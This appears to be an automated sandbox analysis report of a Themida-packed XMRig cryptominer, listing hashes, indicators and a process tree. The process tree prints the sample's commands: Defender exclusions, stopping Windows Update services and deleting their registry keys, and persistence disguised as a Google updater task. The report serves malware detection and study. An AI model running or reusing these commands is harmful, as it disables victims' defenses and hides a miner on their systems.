xmrig | 2a52bd1672e345f12e0175bcaec0f9c520c8523d74e576c222a89b7b258f64f2

Analysis

max time kernel
300s
max time network
278s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
25-09-2022 11:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

11.exe
Size

7.0MB
MD5

b76c48fd62b955eea124b76e3e1eddf0
SHA1

40ac78ddd36295c7abf81e9e1405f2e75953ab17
SHA256

2a52bd1672e345f12e0175bcaec0f9c520c8523d74e576c222a89b7b258f64f2
SHA512

9e5b59f61a2a1812923110cedd3fe85c9f0e8332450f89a625b525786d0705e8e5f90067c38f8ed73ef1eb446871dbeda8906edba8cb0e4d1893577cf6a85209
SSDEEP

196608:Zff6pVbPXSxEieA3Rry41AjbZLKjewctp28CWcDdod0Xi6P:VypUxRrP1KIePp2jWcy0XiE

Score

10^/10

xmrig evasion miner themida trojan upx

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

updater.exe11.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 11.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	11.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/5060-227-0x00007FF774040000-0x00007FF774834000-memory.dmp	xmrig
behavioral2/memory/5060-228-0x00007FF774040000-0x00007FF774834000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

updater.exe11.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts updater.exe
File created C:\Windows\system32\drivers\etc\hosts 11.exe
Executes dropped EXE 1 IoCs

Processes:

updater.exe

pid process

2548 updater.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe
File created	C:\Windows\system32\drivers\etc\hosts	11.exe

pid	process
2548	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/5060-227-0x00007FF774040000-0x00007FF774834000-memory.dmp	upx
behavioral2/memory/5060-228-0x00007FF774040000-0x00007FF774834000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

updater.exe11.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	11.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	11.exe

Themida packer 20 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/3420-132-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp	themida
behavioral2/memory/3420-133-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp	themida
behavioral2/memory/3420-134-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp	themida
behavioral2/memory/3420-135-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp	themida
behavioral2/memory/3420-136-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp	themida
behavioral2/memory/3420-137-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp	themida
behavioral2/memory/3420-138-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp	themida
behavioral2/memory/3420-140-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp	themida
behavioral2/memory/3420-168-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/2548-173-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp	themida
behavioral2/memory/2548-175-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp	themida
behavioral2/memory/2548-176-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp	themida
behavioral2/memory/2548-177-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp	themida
behavioral2/memory/2548-178-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp	themida
behavioral2/memory/2548-179-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp	themida
behavioral2/memory/2548-180-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp	themida
behavioral2/memory/2548-181-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp	themida
behavioral2/memory/2548-223-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

11.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	11.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

11.exeupdater.exe

pid process

3420 11.exe
2548 updater.exe

pid	process
3420	11.exe
2548	updater.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

updater.exe

description	pid	process	target process
PID 2548 set thread context of 1204	2548	updater.exe	conhost.exe
PID 2548 set thread context of 5060	2548	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

11.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	11.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

3932 sc.exe
3732 sc.exe
2036 sc.exe
224 sc.exe
1320 sc.exe
3428 sc.exe
3676 sc.exe
3656 sc.exe
3952 sc.exe
4056 sc.exe

pid	process
3932	sc.exe
3732	sc.exe
2036	sc.exe
224	sc.exe
1320	sc.exe
3428	sc.exe
3676	sc.exe
3656	sc.exe
3952	sc.exe
4056	sc.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exe

pid	process
3484	powershell.exe
3484	powershell.exe
3436	powershell.exe
3436	powershell.exe
4308	powershell.exe
4308	powershell.exe
1608	powershell.exe
1608	powershell.exe
4104	powershell.exe
4104	powershell.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe
5060	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

668

pid	process
668

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	3484	powershell.exe
Token: SeShutdownPrivilege	2736	powercfg.exe
Token: SeCreatePagefilePrivilege	2736	powercfg.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeShutdownPrivilege	216	powercfg.exe
Token: SeCreatePagefilePrivilege	216	powercfg.exe
Token: SeShutdownPrivilege	524	powercfg.exe
Token: SeCreatePagefilePrivilege	524	powercfg.exe
Token: SeShutdownPrivilege	3848	powercfg.exe
Token: SeCreatePagefilePrivilege	3848	powercfg.exe
Token: SeIncreaseQuotaPrivilege	3436	powershell.exe
Token: SeSecurityPrivilege	3436	powershell.exe
Token: SeTakeOwnershipPrivilege	3436	powershell.exe
Token: SeLoadDriverPrivilege	3436	powershell.exe
Token: SeSystemProfilePrivilege	3436	powershell.exe
Token: SeSystemtimePrivilege	3436	powershell.exe
Token: SeProfSingleProcessPrivilege	3436	powershell.exe
Token: SeIncBasePriorityPrivilege	3436	powershell.exe
Token: SeCreatePagefilePrivilege	3436	powershell.exe
Token: SeBackupPrivilege	3436	powershell.exe
Token: SeRestorePrivilege	3436	powershell.exe
Token: SeShutdownPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeSystemEnvironmentPrivilege	3436	powershell.exe
Token: SeRemoteShutdownPrivilege	3436	powershell.exe
Token: SeUndockPrivilege	3436	powershell.exe
Token: SeManageVolumePrivilege	3436	powershell.exe
Token: 33	3436	powershell.exe
Token: 34	3436	powershell.exe
Token: 35	3436	powershell.exe
Token: 36	3436	powershell.exe
Token: SeIncreaseQuotaPrivilege	3436	powershell.exe
Token: SeSecurityPrivilege	3436	powershell.exe
Token: SeTakeOwnershipPrivilege	3436	powershell.exe
Token: SeLoadDriverPrivilege	3436	powershell.exe
Token: SeSystemProfilePrivilege	3436	powershell.exe
Token: SeSystemtimePrivilege	3436	powershell.exe
Token: SeProfSingleProcessPrivilege	3436	powershell.exe
Token: SeIncBasePriorityPrivilege	3436	powershell.exe
Token: SeCreatePagefilePrivilege	3436	powershell.exe
Token: SeBackupPrivilege	3436	powershell.exe
Token: SeRestorePrivilege	3436	powershell.exe
Token: SeShutdownPrivilege	3436	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe
Token: SeSystemEnvironmentPrivilege	3436	powershell.exe
Token: SeRemoteShutdownPrivilege	3436	powershell.exe
Token: SeUndockPrivilege	3436	powershell.exe
Token: SeManageVolumePrivilege	3436	powershell.exe
Token: 33	3436	powershell.exe
Token: 34	3436	powershell.exe
Token: 35	3436	powershell.exe
Token: 36	3436	powershell.exe
Token: SeIncreaseQuotaPrivilege	3436	powershell.exe
Token: SeSecurityPrivilege	3436	powershell.exe
Token: SeTakeOwnershipPrivilege	3436	powershell.exe
Token: SeLoadDriverPrivilege	3436	powershell.exe
Token: SeSystemProfilePrivilege	3436	powershell.exe
Token: SeSystemtimePrivilege	3436	powershell.exe
Token: SeProfSingleProcessPrivilege	3436	powershell.exe
Token: SeIncBasePriorityPrivilege	3436	powershell.exe
Token: SeCreatePagefilePrivilege	3436	powershell.exe
Token: SeBackupPrivilege	3436	powershell.exe
Token: SeRestorePrivilege	3436	powershell.exe
Token: SeShutdownPrivilege	3436	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

11.execmd.execmd.exepowershell.exeupdater.execmd.execmd.exe

description	pid	process	target process
PID 3420 wrote to memory of 3484	3420	11.exe	powershell.exe
PID 3420 wrote to memory of 3484	3420	11.exe	powershell.exe
PID 3420 wrote to memory of 1996	3420	11.exe	cmd.exe
PID 3420 wrote to memory of 1996	3420	11.exe	cmd.exe
PID 3420 wrote to memory of 1640	3420	11.exe	cmd.exe
PID 3420 wrote to memory of 1640	3420	11.exe	cmd.exe
PID 3420 wrote to memory of 3436	3420	11.exe	powershell.exe
PID 3420 wrote to memory of 3436	3420	11.exe	powershell.exe
PID 1996 wrote to memory of 3656	1996	cmd.exe	sc.exe
PID 1996 wrote to memory of 3656	1996	cmd.exe	sc.exe
PID 1640 wrote to memory of 2736	1640	cmd.exe	powercfg.exe
PID 1640 wrote to memory of 2736	1640	cmd.exe	powercfg.exe
PID 1640 wrote to memory of 216	1640	cmd.exe	powercfg.exe
PID 1640 wrote to memory of 216	1640	cmd.exe	powercfg.exe
PID 1996 wrote to memory of 224	1996	cmd.exe	sc.exe
PID 1996 wrote to memory of 224	1996	cmd.exe	sc.exe
PID 1640 wrote to memory of 524	1640	cmd.exe	powercfg.exe
PID 1640 wrote to memory of 524	1640	cmd.exe	powercfg.exe
PID 1996 wrote to memory of 1320	1996	cmd.exe	sc.exe
PID 1996 wrote to memory of 1320	1996	cmd.exe	sc.exe
PID 1640 wrote to memory of 3848	1640	cmd.exe	powercfg.exe
PID 1640 wrote to memory of 3848	1640	cmd.exe	powercfg.exe
PID 1996 wrote to memory of 3428	1996	cmd.exe	sc.exe
PID 1996 wrote to memory of 3428	1996	cmd.exe	sc.exe
PID 1996 wrote to memory of 3676	1996	cmd.exe	sc.exe
PID 1996 wrote to memory of 3676	1996	cmd.exe	sc.exe
PID 1996 wrote to memory of 4572	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 4572	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 3672	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 3672	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 776	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 776	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 3044	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 3044	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 2288	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 2288	1996	cmd.exe	reg.exe
PID 3420 wrote to memory of 4308	3420	11.exe	powershell.exe
PID 3420 wrote to memory of 4308	3420	11.exe	powershell.exe
PID 4308 wrote to memory of 2832	4308	powershell.exe	schtasks.exe
PID 4308 wrote to memory of 2832	4308	powershell.exe	schtasks.exe
PID 2548 wrote to memory of 1608	2548	updater.exe	powershell.exe
PID 2548 wrote to memory of 1608	2548	updater.exe	powershell.exe
PID 2548 wrote to memory of 4556	2548	updater.exe	cmd.exe
PID 2548 wrote to memory of 4556	2548	updater.exe	cmd.exe
PID 2548 wrote to memory of 3620	2548	updater.exe	cmd.exe
PID 2548 wrote to memory of 3620	2548	updater.exe	cmd.exe
PID 2548 wrote to memory of 4104	2548	updater.exe	powershell.exe
PID 2548 wrote to memory of 4104	2548	updater.exe	powershell.exe
PID 3620 wrote to memory of 4668	3620	cmd.exe	powercfg.exe
PID 3620 wrote to memory of 4668	3620	cmd.exe	powercfg.exe
PID 4556 wrote to memory of 3952	4556	cmd.exe	sc.exe
PID 4556 wrote to memory of 3952	4556	cmd.exe	sc.exe
PID 4556 wrote to memory of 3932	4556	cmd.exe	sc.exe
PID 4556 wrote to memory of 3932	4556	cmd.exe	sc.exe
PID 3620 wrote to memory of 3216	3620	cmd.exe	powercfg.exe
PID 3620 wrote to memory of 3216	3620	cmd.exe	powercfg.exe
PID 4556 wrote to memory of 4056	4556	cmd.exe	sc.exe
PID 4556 wrote to memory of 4056	4556	cmd.exe	sc.exe
PID 3620 wrote to memory of 4756	3620	cmd.exe	powercfg.exe
PID 3620 wrote to memory of 4756	3620	cmd.exe	powercfg.exe
PID 4556 wrote to memory of 3732	4556	cmd.exe	sc.exe
PID 4556 wrote to memory of 3732	4556	cmd.exe	sc.exe
PID 3620 wrote to memory of 328	3620	cmd.exe	powercfg.exe
PID 3620 wrote to memory of 328	3620	cmd.exe	powercfg.exe

C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3484

C:\Windows\SYSTEM32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:1640

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:216

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:524

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3848

C:\Windows\SYSTEM32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3656

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:224

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1320

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:3428

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:3676

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:4572

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:3672

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:776

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:3044

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:2288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#kfqirnwiw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
